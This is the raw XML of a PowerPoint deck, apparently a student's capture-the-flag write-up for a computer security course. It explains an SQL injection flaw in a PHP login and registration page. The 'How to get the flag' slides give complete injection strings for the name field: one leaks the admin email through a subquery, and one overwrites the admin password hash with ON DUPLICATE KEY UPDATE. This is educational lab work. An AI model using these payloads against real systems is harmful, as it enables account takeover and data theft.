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98" r:id="rId4"/>
    <p:sldId id="283" r:id="rId5"/>
    <p:sldId id="299" r:id="rId6"/>
    <p:sldId id="297" r:id="rId7"/>
    <p:sldId id="300" r:id="rId8"/>
    <p:sldId id="301" r:id="rId9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65640-C42A-4FC4-A43D-D8EF7957A410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27/05/62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00B8C11-B12C-45FD-9283-CF7692325B9E}" type="datetime1">
              <a:rPr lang="th-TH" noProof="0" smtClean="0"/>
              <a:pPr/>
              <a:t>27/05/62</a:t>
            </a:fld>
            <a:endParaRPr lang="th-TH" noProof="0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noProof="0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noProof="0" dirty="0"/>
              <a:t>แก้ไขสไตล์ข้อความชื่อเรื่องหลัก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8530193B-564F-4854-8A52-728F3FB19C8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48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000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3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646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4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326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5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393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6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742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สไลด์ชื่อเรื่อ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ตัวแทนรูปภาพ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หรือลากแล้วปล่อยรูปถ่ายของคุณที่นี่</a:t>
            </a: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000" b="1" spc="-300" dirty="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 algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="th-TH" noProof="0" dirty="0"/>
              <a:t>คลิกเพื่อแก้ไขชื่อเรื่องงานนำเสนอ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marL="266700" lvl="0" indent="-266700" algn="ctr" rtl="0"/>
            <a:r>
              <a:rPr lang="th-TH" noProof="0" smtClean="0"/>
              <a:t>คลิกเพื่อแก้ไขสไตล์ชื่อเรื่องรองต้นแบบ</a:t>
            </a:r>
            <a:endParaRPr lang="th-TH" noProof="0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7" name="ชื่อเรื่องรอง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6" name="ตัวแทนข้อความ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คอลัมน์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9" name="ชื่อเรื่องรอง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11" name="ตัวแทนข้อความ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คอลัมน์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10" name="ชื่อเรื่องรอง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13" name="ตัวแทนข้อความ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15" name="ตัวแทนข้อความ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17" name="ตัวแทนข้อความ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5" name="ชื่อเรื่องรอง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ท้ายกระดาษ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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="ชื่อเรื่อง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smtClean="0"/>
              <a:t>คลิกเพื่อแก้ไขสไตล์ชื่อเรื่องต้นแบบ</a:t>
            </a:r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ตัวคั่นสไลด์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ตัวแทนรูปภาพ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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="th-TH" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="th-TH" noProof="0" dirty="0"/>
              <a:t>รูปถ่ายของคุณที่นี่</a:t>
            </a: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 algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="th-TH" noProof="0" dirty="0"/>
              <a:t>คลิกเพื่อแก้ไขตัวแบ่งส่วน</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ชื่อเรื่องรอง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h-TH" noProof="0" dirty="0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ตัวคั่นสไลด์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ตัวแทนรูปภาพ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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="th-TH" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="th-TH" noProof="0" dirty="0"/>
              <a:t>รูปถ่ายของคุณที่นี่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คลิกเพื่อแก้ไขตัวแบ่งส่วน</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ชื่อเรื่องรอง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h-TH" noProof="0" dirty="0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ค้าโครงรูปข้อความ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รูปภาพ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หรือลากแล้วปล่อยรูปถ่ายของคุณ</a:t>
            </a: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แก้ไขชื่อเรื่องของหน้า</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ชื่อเรื่องรอง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ค้าโครงรูปข้อความ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รูปภาพ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หรือลากแล้วปล่อยรูปถ่ายของคุณ</a:t>
            </a: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10" name="ชื่อเรื่องรอง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9" name="ชื่อเรื่องรอง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การเปรียบเทียบตัวแทนซ้าย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12" name="การเปรียบเทียบตัวแทนซ้าย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ข้อความ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รูปถ่ายขนาดใหญ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รูปภาพ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หรือลากแล้วปล่อยรูปถ่ายของคุณ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h-TH" noProof="0" dirty="0"/>
              <a:t>ใส่คำอธิบายภาพของคุณ</a:t>
            </a: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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ชื่อเรื่อง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smtClean="0"/>
              <a:t>คลิกเพื่อแก้ไขสไตล์ชื่อเรื่องต้นแบบ</a:t>
            </a:r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ขอบคุณ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ตัวแทนรูปภาพ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แทรก หรือลากแล้วปล่อยรูปถ่ายของคุณที่นี่</a:t>
            </a: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 algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="th-TH" noProof="0" dirty="0"/>
              <a:t>ขอบคุณ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ตัวแทนข้อความ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ชื่อเต็ม</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ตัวแทนข้อความ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หมายเลขโทรศัพท์</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ตัวแทนข้อความ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7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อีเมลหรือหมายเลขอ้างอิงสื่อสังคม</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ตัวแทนข้อความ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เว็บไซต์บริษัท</a:t>
            </a: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7" name="ชื่อเรื่องรอง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th-TH" noProof="0" dirty="0"/>
              <a:t>ชื่อเรื่องรอง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 smtClean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1" name="รูปแบบอิสระ: รูปร่าง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" name="ตัวแทนชื่อเรื่อง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th-TH" noProof="0" dirty="0"/>
              <a:t>คลิกเพื่อแก้ไขชื่อเรื่องของหน้า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th-TH" noProof="0" dirty="0"/>
              <a:t>แก้ไขสไตล์ข้อความชื่อเรื่องหลัก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noProof="0" dirty="0"/>
              <a:t>เพิ่มท้ายกระดาษ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9B51A1E-902D-48AF-9020-955120F399B6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th-TH" sz="2500" b="1" i="0" spc="-100" noProof="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TREY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="th-TH" sz="1600" b="1" i="0" spc="-100" noProof="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sz="1600" b="1" i="0" spc="-100" baseline="0" noProof="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/>
            </a:r>
            <a:br>
              <a:rPr lang="th-TH" sz="1600" b="1" i="0" spc="-100" baseline="0" noProof="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th-TH" sz="12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การค้นคว้า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noProof="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18" name="ตัวเชื่อมต่อตรง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nyemail@admi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crypt-generato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akeadmin@admin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ตัวแทนรูปภาพ 11" descr="การจับมือกันเป็นวงกลม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ชื่อเรื่อง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sz="6000" dirty="0" smtClean="0"/>
              <a:t>SQL INJECTION</a:t>
            </a:r>
            <a:endParaRPr lang="th-TH" sz="6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ชื่อเรื่องรอง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Computer and Communication Security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ตัวแทนรูปภาพ 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns=""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33" y="86033"/>
            <a:ext cx="7463267" cy="6094634"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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133" y="112799"/>
            <a:ext cx="4648200" cy="985000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t>WEBSITE</a:t>
            </a:r>
            <a:endParaRPr lang="th-TH" sz="6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1667" y="1097799"/>
            <a:ext cx="4029733" cy="917268"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This page consists of two main parts which are log in and registration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pPr/>
              <a:t>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Vulnerability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05855"/>
            <a:ext cx="5472000" cy="360000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="300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st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point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57" y="4176657"/>
            <a:ext cx="5472000" cy="2194694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	In case of registration, there is a condition that only filter the validation of entered email without consider to check the variable of name.</a:t>
            </a:r>
            <a:endParaRPr lang="th-TH" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="ตัวเชื่อมต่อตรง 10" descr="ตัวคั่นสไลด์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ตัวแทนข้อความ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605855"/>
            <a:ext cx="5472000" cy="358775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="300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nd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point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7887" y="4176657"/>
            <a:ext cx="5472113" cy="2196041"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>In function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>no_hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, it will be used to check whether user is a hacker or not by checking the input in ‘name’ that it consists of ‘select ’, ‘union’ or ‘sleep’ or not. The vulnerability is there is a space after the word ‘select’, hence, a hacker can type ‘select(‘ instead, which a hacker will not be detected. </a:t>
            </a:r>
            <a:endParaRPr lang="th-TH" sz="1600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pPr rtl="0"/>
              <a:t>3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ตัวแทนข้อความ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 There are 2 vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file.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4" y="2112274"/>
            <a:ext cx="5472000" cy="1968659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625" y="2112275"/>
            <a:ext cx="5324575" cy="19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200335"/>
            <a:ext cx="6641900" cy="1124345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US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How to get the flag</a:t>
            </a:r>
            <a:endParaRPr lang="th-TH" sz="5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1427807"/>
            <a:ext cx="6641626" cy="4431126"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In name field, use SQL injection to add new record with a sub query. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>The example structure of inserting data is below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>INSERT INTO users(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>isAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, name, email, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>) VALUES (0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'nameA1', 'emailA2@email.com', 'passwdA3'),(0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,&lt;SQL sub query&gt;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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'emailB2@email.com‘, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'passwdB3');--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>','xx','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>yy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>'); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;SQL sub query&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>can be any format that can make a hacker to get or access specific data that hacker would like to get. In this problem, it’s necessary to get an email of admin hence, ‘select(email) from users as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>isAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = 1 order by id limit 1’ will be used.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:b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/>
            </a:r>
            <a:b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Solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0"/>
              <a:t>Register </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: temp2','temp2@temp.com','temp2Password'),(0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,(select(email) from users as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isAdmin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 order by id limit 1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, 'fakeadmin@admin.com', '$2y$12$.qoI6WIvSEVxRhhlO64Sq.SiO556MU2f0Ww05Ro3Y.bi.6Z.b2UH6');--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email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anyemail@admin.com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chemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>anypassword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/>
              <a:t>PS. Hash by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://bcrypt-generator.com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) – used to convert string to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> encrypted hash. </a:t>
            </a:r>
            <a:endParaRPr lang="th-TH" sz="1400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pPr rtl="0"/>
              <a:t>4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667" y="956734"/>
            <a:ext cx="2471399" cy="3953933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5025030"/>
            <a:ext cx="3318066" cy="833903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="สี่เหลี่ยมผืนผ้า 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1651000" y="956733"/>
            <a:ext cx="772033" cy="38843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200335"/>
            <a:ext cx="6641900" cy="1124345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US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How to get the flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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con.</a:t>
            </a:r>
            <a:endParaRPr lang="th-TH" sz="18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1427806"/>
            <a:ext cx="6641626" cy="4617393"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p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Solution con.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(PS. Password before hash is ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>fakeadminpassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" smtClean="0"/>
              <a:t>Log in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Email: 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fakeadmin@admin.com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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fakeadminpassword</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>When user is logged in with valid email and password, the name will be stored in .$_SESSION[‘name’] and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>flag.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> will indicate message of ‘you’re logged in as non-admin user:’ $_SESSION[‘name’], due to $_SESSION[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>isAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>’] is false (0) and $_SESSION[‘email’] !== @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>emailOfTheRealAdmin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If a hacker log in with email and password above, $_SESSION[‘name’] will indicate an email of admin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Hence, hacker would know that ‘admin.win@ctf.com’ is an email of admin.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pPr rtl="0"/>
              <a:t>5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3319994"/>
            <a:ext cx="2884442" cy="1785408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0" y="5199288"/>
            <a:ext cx="4488752" cy="845911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877732" y="3319993"/>
            <a:ext cx="1206376" cy="1785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427806"/>
            <a:ext cx="4967242" cy="17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200335"/>
            <a:ext cx="6641900" cy="1124345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US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How to get the flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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con.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5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endParaRPr lang="th-TH" sz="5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1288105"/>
            <a:ext cx="6641626" cy="5083246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Although a hacker got admin’s email, a hacker does not know the real password of admin hence, a hacker will do function of register in order to update the password that is set by himself/herself on duplicate key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0" smtClean="0"/>
              <a:t>Register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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>x', 'admin.win@ctf.com', '1') ON DUPLICATE KEY UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>='$2y$10$gvvahVeg8oNG2wryfcLJS.CGfcCuwC2Q/BxDCXLa.QREiKR0kbwSC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>';--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Email: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>fakeadmin@ctf.com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Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>1234</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Which ‘$2y$10$gvvahVeg8oNG2wryfcLJS.CGfcCuwC2Q/BxDCXLa.QREiKR0kbwSC’ that is set as new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t>password is equal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>to ‘B2’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>From this action, the password of  ‘admin.win@ctf.com’ will be changed to ‘B2’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0" smtClean="0"/>
              <a:t>Log in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Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>: ‘admin.win@ctf.com’ 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Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>: ‘B2’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>The flag is found, after logged in, due to it’s matched with condition that $_SESSION[‘email’] == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>emailOfTheRealAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> and $_SESSION[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>isAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>’] = true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pPr rtl="0"/>
              <a:t>6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4" y="243725"/>
            <a:ext cx="2672976" cy="236816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24" y="2801438"/>
            <a:ext cx="2672976" cy="1844729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90" y="4759518"/>
            <a:ext cx="3348310" cy="952500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1604690" y="243725"/>
            <a:ext cx="592667" cy="4402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145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846_TF16411250.potx" id="{68C6A3E0-60E6-4E7C-BC2B-A48E8436D582}" vid="{112F5B3E-CA2B-48AB-A4FA-DEFE855F3EE2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งานนำเสนอทางธุรกิจที่สว่างสดใส</Template>
  <TotalTime>0</TotalTime>
  <Words>525</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>แบบจอกว้าง</PresentationFormat>
  <Paragraphs>51</Paragraphs>
  <Slides>6</Slides>
  <Notes>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0" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Candara</vt:lpstr>
      <vt:lpstr>Leelawadee</vt:lpstr>
      <vt:lpstr>ธีมของ Office</vt:lpstr>
      <vt:lpstr>SQL INJECTION</vt:lpstr>
      <vt:lpstr>WEBSITE</vt:lpstr>
      <vt:lpstr>Vulnerability</vt:lpstr>
      <vt:lpstr>How to get the flag</vt:lpstr>
      <vt:lpstr>How to get the flag con.</vt:lpstr>
      <vt:lpstr>How to get the flag con.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2019-05-27T06:28:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-27T15:13:57Z</dcterms:modified>
</cp:coreProperties>
</file>